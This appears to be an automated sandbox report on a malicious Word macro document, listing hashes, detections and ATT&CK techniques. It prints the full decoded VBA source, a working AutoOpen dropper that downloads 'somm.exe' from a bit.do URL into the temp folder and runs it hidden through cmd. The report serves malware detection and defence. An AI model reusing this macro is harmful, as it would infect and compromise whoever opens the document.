Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ecaa7dd92961a11e…

MALICIOUS

Office (OOXML)

98.7 KB Created: 2015-01-22 18:27:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2015-05-07
MD5: 22ab4130e32edb89b9b9481a64f99bbf SHA-1: c73c22cb76a972367d337236ccbdb8b7c8ed6a3f SHA-256: ecaa7dd92961a11efbb17b65c4b7c919d63d8ec2c9bb7019e786b70c1f03b456
298 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is an OOXML document containing VBA macros. The document body instructs the user to enable content for security reasons, a common lure. The AutoOpen macro uses URLDownloadToFile to download a file from "http://bit.do/elo21april" into the temporary directory as "somm.exe", and then executes it using cmd.exe. This indicates a dropper functionality.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6368968-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6368968-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
       Shell "cmd /k """ & strFile & """", strWndStyle
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
        Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        URLDownloadToFile 0, "http://bit.do/elo21april", Environ("TEMP") & "\somm.exe", 0, 0
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://bit.do/elo21april Referenced by macro
    • http://bit.do/elo21april�Referenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1260 bytes
SHA-256: 77171a431fbe07f828fea3d98d40307847bcea18a9317e93704cf1752e1e2e90
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
#If VBA7 Then
    Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
    
#Else
    Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
        (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#End If

Sub AutoOpen()
    URLDownloadToFile 0, "http://bit.do/elo21april", Environ("TEMP") & "\somm.exe", 0, 0
    Dim strPath As String
    strPath = Environ("TEMP") & "\somm.exe"
    'MsgBox (strPath)
    Dim i
    i = RunFile(Environ("TEMP") & "\somm.exe", vbHide)
End Sub

Function RunFile(strFile As String, strWndStyle As String)
   Shell "cmd /k """ & strFile & """", strWndStyle
   On Error Resume Next
   Exit Function
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 9216 bytes
SHA-256: f7f2ea3a113fced07aaf8d1aca1a4881f1b2d7881543e3a88d32bb455905a047
Detection
ClamAV: Doc.Dropper.Agent-6368968-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.